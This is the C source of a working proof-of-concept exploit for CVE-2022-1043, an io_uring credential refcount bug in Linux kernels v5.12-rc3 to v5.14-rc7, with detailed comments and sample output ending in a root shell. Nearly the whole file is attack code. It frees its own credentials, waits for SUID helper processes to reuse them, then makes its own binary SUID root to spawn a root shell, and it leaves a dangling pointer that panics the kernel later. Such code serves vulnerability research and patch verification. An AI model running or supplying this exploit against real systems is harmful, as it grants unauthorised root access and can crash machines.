/* PoC for CVE-2022-1043, a bug in io_uring leading to an additional put_cred()
 * that can be exploited to hijack credentials of other processes.
 *
 * We spawn SUID programs to get the free'd cred object reallocated by a
 * privileged process and abuse them to create a SUID root binary ourselves
 * that'll pop a shell.
 *
 * The dangling cred pointer will, however, lead to a kernel panic as soon as
 * the task terminates and its credentials are destroyed. We therefore detach
 * from the controlling terminal, block all signals and rest in silence until
 * the system shuts down and we get killed hard, just to cry in vain, seeing
 * the kernel collapse.
 *
 * The bug affected kernels from v5.12-rc3 to v5.14-rc7 and has been fixed by
 * commit a30f895ad323 ("io_uring: fix xa_alloc_cycle() error return value
 * check").
 *
 * user@box:~$ gcc -pthread cve-2022-1043.c -o cve-2022-1043
 * user@box:~$ ./cve-2022-1043
 * [~] forking helper process...
 * [~] creating worker threads...
 * [~] ID wrapped after 65536 allocation attempts! (id = 1)
 * [~] ID wrapped again after 131071 allocation attempts! (id = 1)
 * [~] waiting for creds to get reallocated...
 * [.] reused by uninteresting EUID -16843010 (PaX MEMORY_SANITIZE?)
 * [.] reused by uninteresting EUID 1000
 * [*] waiting for root shell...
 * # id
 * uid=0(root) gid=0(root) groups=0(root),1000(user)
 *
 * (c) 2022 Open Source Security, Inc.
 *
 * - minipli
 *
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software
 *  Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 */

#define _GNU_SOURCE
#include <linux/io_uring.h>
#include <sys/syscall.h>
#include <sys/prctl.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <sys/wait.h>
#include <pthread.h>
#include <unistd.h>
#include <limits.h>
#include <signal.h>
#include <stdbool.h>
#include <stdlib.h>
#include <stdarg.h>
#include <sched.h>
#include <stdio.h>
#include <fcntl.h>

/* EUID value treated as "object was poisoned" by do_trigger(): the constant is
 * the byte 0xfe repeated and gets truncated to the width of uid_t by the cast.
 * Presumably this is the fill pattern of PaX MEMORY_SANITIZE (see the progress
 * message in do_trigger()) -- confirm against the kernel config in use.
 */
#define MEM_SANITIZE_UID	((uid_t)0xfefefefefefefefe)
/* Bound for the ID space; do_trigger() performs at most
 * 2 * IORING_ID_MAX + 1 registration attempts.
 */
#define IORING_ID_MAX		USHRT_MAX

/* SUID_HELPER expands to the leading elements of the argv[] initializer used
 * by suid_spawner(); the first element is also the path handed to execve().
 */
#if 0
#define SUID_HELPER	"/bin/passwd", "-S"
#else
#define SUID_HELPER	"/usr/bin/su"	/* noisier, but faster! */
#endif
/* Number of helper processes suid_spawner() forks before it synchronizes with
 * do_trigger() and reaps them.
 */
#define NUM_PROCS	10

extern char **environ;

/* Page shared between the processes (MAP_SHARED mapping created in main()).
 * 'check' is set to 1 by suid_spawner() once a batch of helpers is running
 * and reset to 0 by do_trigger() after it inspected its credentials.
 */
static struct shmem { volatile int check; } *shmem;
/* process_pipes[0]: do_unregister() -> suid_spawner() ("start spawning"),
 * process_pipes[1]: suid_spawner()  -> main()         ("spawner is ready").
 */
static int process_pipes[2][2] = { { -1, -1 }, { -1, -1 } };
/* do_trigger() -> do_unregister(), carries the ID that is to be unregistered */
static int thread_pipe[2] = { -1, -1 };
/* Per-thread flag consulted by msg(): once cleared, fatal messages park the
 * thread in zombify() instead of calling exit().
 */
static __thread bool allowed_to_die = true;
/* io_uring file descriptor, set up in child() and used by both worker threads */
static int fd = -1;

/* Fallback syscall number for headers that do not provide it */
#ifndef __NR_io_uring_setup
#define __NR_io_uring_setup		425
#endif
/* Raw io_uring_setup(2) invocation via syscall().
 *
 * entries and p are handed to the kernel unmodified. The result of syscall()
 * is returned narrowed to int; a negative value signals failure.
 */
static int io_uring_setup(unsigned int entries, struct io_uring_params *p)
{
	long rc = syscall(__NR_io_uring_setup, entries, p);

	return (int)rc;
}

/* Fallback syscall number for headers that do not provide it */
#ifndef __NR_io_uring_register
#define __NR_io_uring_register	427
#endif
/* Raw io_uring_register(2) invocation via syscall().
 *
 * fd is the ring's file descriptor, oc the register opcode, arg/nr_args the
 * opcode specific payload. All of them are handed to the kernel unmodified.
 * The result of syscall() is returned narrowed to int.
 */
static int io_uring_register(int fd, unsigned int oc, void *arg,
                             unsigned int nr_args)
{
	long rc = syscall(__NR_io_uring_register, fd, oc, arg, nr_args);

	return (int)rc;
}

/* Park the caller forever: block every signal via sigprocmask() and loop on
 * pause(). This function never returns.
 *
 * If closefds is non-zero, all pipe ends known to this file as well as
 * stdin, stdout and stderr are closed first.
 */
static void zombify(int closefds) {
	sigset_t everything;

	sigfillset(&everything);
	sigprocmask(SIG_BLOCK, &everything, NULL);

	if (closefds) {
		/* Same descriptors, same order as a hand-written close() list;
		 * slots that were never opened still hold -1 and simply fail.
		 */
		const int doomed[] = {
			process_pipes[0][0], process_pipes[0][1],
			process_pipes[1][0], process_pipes[1][1],
			thread_pipe[0], thread_pipe[1],
			0, 1, 2,
		};
		size_t idx;

		for (idx = 0; idx < sizeof(doomed) / sizeof(doomed[0]); idx++)
			close(doomed[idx]);
	}

	while (1)
		pause();
}

/* Logging front ends for msg(). _msg() appends the trailing newline to the
 * format string; its first argument is msg()'s 'die' flag.
 *
 *   die()   - fatal (die = 1), prefix "[!] "
 *   err()   - fatal (die = 1), prefix "[!] ", appends ": %m" (glibc's printf
 *             extension that prints the message for the current errno)
 *   warn()  - non-fatal, prefix "[-] "
 *   info()  - non-fatal, prefix "[~] "
 *   info2() - non-fatal, prefix "[.] "
 *   info3() - non-fatal, prefix "[*] "
 *
 * fmt must be a string literal as it gets concatenated with the prefix and
 * suffix at compile time.
 */
#define _msg(e, fmt,...) msg(e, fmt "\n", ##__VA_ARGS__)
#define die(fmt,...)	_msg(1, "[!] " fmt, ##__VA_ARGS__)
#define err(fmt,...)	_msg(1, "[!] " fmt ": %m", ##__VA_ARGS__)
#define warn(fmt,...)	_msg(0, "[-] " fmt, ##__VA_ARGS__)
#define info(fmt,...)	_msg(0, "[~] " fmt, ##__VA_ARGS__)
#define info2(fmt,...)	_msg(0, "[.] " fmt, ##__VA_ARGS__)
#define info3(fmt,...)	_msg(0, "[*] " fmt, ##__VA_ARGS__)

/* Print a printf-style message to stdout and optionally terminate.
 *
 * die: if zero, the function returns after printing. If non-zero, the caller
 *      does not get control back: the process exits with status 1 when the
 *      calling thread's allowed_to_die flag is set, otherwise the thread is
 *      parked via zombify(1).
 * fmt: printf format string, followed by its arguments.
 */
static void msg(int die, const char *fmt,...) __attribute__((format(printf,2,3)));
static void msg(int die, const char *fmt,...) {
	va_list va;

	va_start(va, fmt);
	vprintf(fmt, va);
	va_end(va);

	/* Flush right away. zombify(1) closes fd 1 without flushing, so a
	 * fully buffered stdout (pipe, file) would silently drop the last
	 * diagnostics. Pending buffer content would also be inherited by
	 * every process fork()ed later on and could show up twice.
	 */
	fflush(stdout);

	if (!die)
		return;

	if (!allowed_to_die) {
		warn("not allowed to die, zombie time!");
		zombify(1);
	} else
		exit(1);
}

/* Restrict the calling thread to the given CPU.
 *
 * Note the inverted sense of the result: returns true if
 * sched_setaffinity() FAILED and false if the affinity was applied.
 */
static bool pin_cpu(int cpu) {
	cpu_set_t mask;
	int rc;

	CPU_ZERO(&mask);
	CPU_SET(cpu, &mask);

	rc = sched_setaffinity(0, sizeof(mask), &mask);

	return rc != 0;
}

/* Tell whether path is a set-user-ID root executable.
 *
 * Returns true only if stat() succeeds, the file is owned by UID 0 and its
 * mode has the set-user-ID bit plus the execute bits for user, group and
 * others set. Any stat() failure yields false.
 */
static bool is_suid(const char *path) {
	const mode_t wanted = S_ISUID | S_IXUSR | S_IXGRP | S_IXOTH;
	struct stat st;

	if (stat(path, &st) != 0)
		return false;

	if (st.st_uid != 0)
		return false;

	return (st.st_mode & wanted) == wanted;
}

/* Thread entry point (started from child()) driving the main sequence laid
 * out in the "Plan" comment below.
 *
 * arg is not used. On the success path the function ends in zombify(1) and
 * therefore never returns; the trailing 'return arg' only satisfies the
 * pthread start routine signature. Fatal errors go through err()/die(), which
 * exit the process as long as allowed_to_die is still set and park the thread
 * afterwards.
 *
 * Communicates with do_unregister() through thread_pipe and with
 * suid_spawner() through shmem->check.
 */
static void *do_trigger(void *arg) {
	uid_t uid, last_uid;
	int last, ret, i;
	int wrapped;

	/* Plan:
	 * - setuid(getuid()) to get some fresh unshared creds
	 * - register/unregister loop until ID wrapped twice (and cred put)
	 * - switch CPU and signal helper to unregister and do the final put of our
	 *   creds to avoid hitting sanity checks in __put_cred()
	 * - wait until cred got reallocated by a privileged process
	 * - pin hijacked cred by registering once more
	 * - abuse creds to make /proc/self/exe SUID root
	 * - rest in silence
	 */

	/* Get a fresh cred object */
	uid = getuid();
	if (setuid(uid))
		err("%s: setuid(%d)", __func__, uid);

	/* Trigger bug by making the ID wrap */
	wrapped = 0;
	ret = last = -1;
	for (i = 0; i < 2 * IORING_ID_MAX + 1; i++) {
		ret = io_uring_register(fd, IORING_REGISTER_PERSONALITY, NULL, 0);
		if (ret < 0) {
			err("%s: io_uring_register(IORING_REGISTER_PERSONALITY) # %d",
			    __func__, i);
		}

		/* 'last' tracks the highest ID handed out so far... */
		if (last < ret)
			last = ret;

		/* ...so getting a smaller one back means the allocator wrapped */
		if (ret < last) {
			info("ID wrapped%s after %d allocation attempts! (id = %d)",
			     wrapped ? " again" : "", i+1, ret);

			/* We do the first put ourselves, only the final one needs to be
			 * done by a different task.
			 */
			wrapped++;
			/* Leave the loop with the ID still registered; it is
			 * handed to do_unregister() through thread_pipe below.
			 */
			if (wrapped == 2)
				break;

			last = ret;
		}

		if (io_uring_register(fd, IORING_UNREGISTER_PERSONALITY, NULL, ret)) {
			err("%s: io_uring_register(IORING_UNREGISTER_PERSONALITY, %d)",
			    __func__, ret);
		}
	}

	/* If we triggered the bug, we have no valid creds any more, we're not
	 * allowed to terminate!
	 */
	if (wrapped)
		allowed_to_die = false;

	/* With allowed_to_die cleared after a single wrap, this die() parks the
	 * thread via zombify(1) instead of exiting.
	 */
	if (wrapped < 2) {
		die("IDs didn't wrap%s after %d allocation attempts?!?",
		    wrapped ? " often enough" : "", i);
	}

	/* Switch CPUs to not trip the checks in __put_cred() about destroying our
	 * own creds via the RCU worker.
	 */
	/* pin_cpu() returns true on failure */
	if (pin_cpu(1))
		err("%s: failed to pin to CPU #%d", __func__, 1);

	/* Signal helper to unregister */
	if (write(thread_pipe[1], &ret, sizeof(ret)) < (int)sizeof(ret))
		err("%s: failed to signal helper thread", __func__);

	/* Wait for creds to be reallocated by a privileged process */
	info("waiting for creds to get reallocated...");

	last_uid = uid;
	for (;;) {
		/* Number of "reused by ..." progress lines left to print */
		static int print_limit = 5;
		uid_t new_uid;
		/* NOTE(review): 'ch' is not used anywhere in this loop */
		char ch;

		/* Wait for a flock of root creds getting allocated */
		/* shmem->check is raised by suid_spawner() once a full batch of
		 * helper processes has been forked.
		 */
		while (!shmem->check)
			usleep(1);

		/* Non-faulting sanity checks first */
		/* Skip this batch unless the securebits read back as 0... */
		if (prctl(PR_GET_SECUREBITS, 0, 0, 0, 0) != 0)
			goto next_batch;

		/* ...and capabilities 0..39 are all reported as present in the
		 * bounding set.
		 */
		for (i = 0; i < 40; i++) {
			if (prctl(PR_CAPBSET_READ, i, 0, 0, 0) != 1)
				goto next_batch;
		}

		/* Check EUID, as we're spawning SUID processes */
		new_uid = geteuid();
		if (new_uid == 0)
			break;

		/* Show some progress along the way... */
		if (new_uid != last_uid && print_limit) {
			bool mem_sanititze = new_uid == MEM_SANITIZE_UID;

			/* NOTE(review): uid_t is printed with %d, i.e. as a
			 * signed value; the sample output in the file header
			 * relies on this (negative EUID for the poison value).
			 */
			info2("reused by uninteresting EUID %d%s", new_uid,
			      mem_sanititze ? " (PaX MEMORY_SANITIZE?)" : "");

			print_limit--;
			if (print_limit == 0)
				info("muting further changes, waiting for root creds!");
		}

		last_uid = new_uid;

next_batch:	/* Reap the zombies and try again */
		/* Clearing the flag releases suid_spawner() from its wait loop */
		shmem->check = 0;
	}

	/* Prevent the hijacked creds from vanishing under us by grabbing another
	 * reference.
	 */
	ret = io_uring_register(fd, IORING_REGISTER_PERSONALITY, NULL, 0);
	if (ret < 0)
		err("%s: io_uring_register(IORING_REGISTER_PERSONALITY) for foreign cred pinning",
		    __func__);

	/* Give any possibly pending LSM setup time to finish. */
	usleep(250 * 1000);

	/* Make this binary SUID root */
	/* Group ownership is left untouched by passing (gid_t)-1 */
	if (chown("/proc/self/exe", 0, (gid_t)-1))
		err("chown() failed! bad creds?");

	if (chmod("/proc/self/exe", 04755))
		err("chmod() failed! bad creds?");

	info3("waiting for root shell...");

	/* Let the spawner reap the zombies and spawn our shell. */
	shmem->check = 0;

	/* Never returns */
	zombify(1);

	return arg;
}

/* Thread entry point (started from child()): waits for do_trigger() to send
 * an ID over thread_pipe, unregisters that ID from this thread and then
 * notifies suid_spawner() through process_pipes[0].
 *
 * Returns arg, either after the notification was sent or right away if the
 * pipe reported end-of-file. Any other failure is fatal via err().
 */
static void *do_unregister(void *arg) {
	ssize_t got;
	int id;

	/* Wait for do_trigger() to align the stars^Wcreds */
	got = read(thread_pipe[0], &id, sizeof(id));
	if (got == 0)
		return arg;
	if (got != (ssize_t)sizeof(id))
		err("%s: read()", __func__);

	/* Final put_cred() for the other thread's creds */
	if (io_uring_register(fd, IORING_UNREGISTER_PERSONALITY, NULL, id) != 0) {
		err("%s: io_uring_register(IORING_UNREGISTER_PERSONALITY, %d)",
		    __func__, id);
	}

	/* Let the SUID spawner know we're ready */
	if (write(process_pipes[0][1], "1", 1) < 1)
		err("%s: write(pipe)", __func__);

	return arg;
}

/* Body of the helper process forked first in main(). Never returns: it loops
 * until it can execve() itself or terminates through err().
 *
 * pipe_rd: read end on which the start signal arrives (one byte, written by
 *          do_unregister()).
 * pipe_wr: write end used to tell main() that this process is set up.
 *
 * Once started, it keeps forking SUID_HELPER processes in batches of
 * NUM_PROCS and hands over to do_trigger() through shmem->check after each
 * batch. As soon as /proc/self/exe passes is_suid() it re-executes itself.
 */
static void suid_spawner(int pipe_rd, int pipe_wr) {
	char *argv[] = { SUID_HELPER, NULL };
	/* Number of forked helpers that have not been reaped yet */
	int procs = 0;
	char ch;

	shmem->check = 0;

	/* Ask the kernel to SIGKILL us when the parent goes away */
	if (prctl(PR_SET_PDEATHSIG, SIGKILL, 0, 0, 0) < 0)
		err("%s: prctl(PR_SET_PDEATHSIG)", __func__);

	/* Signal we're ready */
	if (write(pipe_wr, "1", 1) <= 0)
		err("%s: write(pipe)", __func__);

	/* Wait for the trigger */
	if (read(pipe_rd, &ch, sizeof(ch)) <= 0)
		err("%s: read(pipe)", __func__);

	for (;;) {
		/* Break as soon as we were able to exploit the hijacked privs */
		if (is_suid("/proc/self/exe")) {
			/* Reap every helper still accounted for */
			while (procs--)
				wait(NULL);

			/* argv[0] is set to the helper's path; main() execs
			 * argv[0] on its SUID fast lane.
			 */
			execve("/proc/self/exe", (char *const []){ argv[0], NULL }, environ);
			err("%s: exec(self)", __func__);
		}

		switch (fork()) {
			case -1:
				/* fork() failed: back off briefly, procs unchanged */
				usleep(1);
				break;
			case 0:
				/* Ensure the forked helper stays silent */
				close(0); close(1); close(2);
				execve(argv[0], argv, environ);
				exit(1);
			default:
				procs++;
		}

		if (procs >= NUM_PROCS) {
			/* Sync with do_trigger() before reaping processes */
			shmem->check = 1;
			/* do_trigger() resets the flag once it has looked at
			 * its credentials.
			 */
			while (shmem->check)
				usleep(1);
			/* Block for one child, then collect whatever else has
			 * already exited without blocking.
			 */
			if (wait(NULL) > 0)
				procs--;
			while (waitpid(-1, NULL, WNOHANG) > 0)
				procs--;
		}
	}
}

/* Body of the detached worker process forked in main().
 *
 * Calls daemon(1, 1), creates the io_uring instance (stored in the global
 * fd) and the thread_pipe, then starts the do_trigger() and do_unregister()
 * threads. After do_unregister() finished, the calling thread parks itself
 * in zombify(0), so the 'return 1' is never reached. Setup failures are
 * fatal via err().
 */
static int child(void) {
	struct io_uring_params params = { 0 };
	pthread_t trigger_thread, unregister_thread;

	if (daemon(1, 1) != 0)
		err("parent: daemon()");

	fd = io_uring_setup(1, &params);
	if (fd < 0)
		err("parent: io_uring_setup()");

	info("creating worker threads...");
	if (pipe(thread_pipe) != 0)
		err("parent: pipe()");

	if (pthread_create(&trigger_thread, NULL, do_trigger, NULL) != 0)
		err("pthread_create()");

	if (pthread_create(&unregister_thread, NULL, do_unregister, NULL) != 0)
		err("pthread_create()");

	/* Only the unregister thread terminates; do_trigger() zombifies itself,
	 * so there is nothing to join on that side.
	 */
	pthread_join(unregister_thread, NULL);
	zombify(0);

	return 1;
}

/* Program entry point.
 *
 * - Refuses to run with a real UID of 0.
 * - With an effective UID of 0 (the SUID fast lane) it switches UID and GID
 *   to 0 and executes argv[0]; suid_spawner() sets argv[0] to the helper's
 *   path when it re-executes this binary.
 * - Otherwise it pins itself to CPU 0, creates the pipes and the shared
 *   page, forks the suid_spawner() process, waits for its ready byte, forks
 *   the process running child() and finally waits for the spawner.
 *
 * Returns 0 after the spawner terminated; setup failures are fatal via
 * err()/die().
 */
int main(int argc, char *argv[]) {
	pid_t pid, detached;
	char ch;

	(void)argc;

	if (!getuid())
		die("ahem...");

	/* Fast lane for the SUID path */
	if (!geteuid()) {

		if (setuid(0) || setgid(0))
			err("set*id(0)");

		execve(argv[0], argv, NULL);
		err("execve('%s') failed", argv[0]);
	}

	/* Ensure all tasks start on the same CPU to share SLUB's partial slabs */
	/* pin_cpu() returns true on failure */
	if (pin_cpu(0))
		err("failed to pin to CPU #%d", 0);

	info("forking helper process...");
	if (pipe(process_pipes[0]) < 0 || pipe(process_pipes[1]) < 0)
		err("pipe()");

	shmem = mmap(NULL, sysconf(_SC_PAGESIZE), PROT_READ | PROT_WRITE,
	             MAP_ANONYMOUS | MAP_SHARED, -1, 0);
	if (shmem == MAP_FAILED)
		err("mmap(shmem)");

	pid = fork();
	switch (pid) {
		case  0: suid_spawner(process_pipes[0][0], process_pipes[1][1]);
		         /* fall-through -- not! suid_spawner() never returns */
		case -1: err("fork()");
	}

	/* Wait till the child is ready to ensure proper process reaping */
	if (read(process_pipes[1][0], &ch, sizeof(ch)) <= 0)
		err("parent: read(pipe)");

	/* Detach from the controlling terminal, we might need to sleep forever */
	detached = fork();
	if (detached < 0)
		err("fork()");
	if (detached == 0)
		exit(child());

	/* Reap exactly the process forked above (child() calls daemon(), so it
	 * goes away quickly). A plain wait() could pick up the spawner instead
	 * and make the waitpid() below fail.
	 */
	waitpid(detached, NULL, 0);

	/* Wait for the SUID spawner to finish */
	waitpid(pid, NULL, 0);

	return 0;
}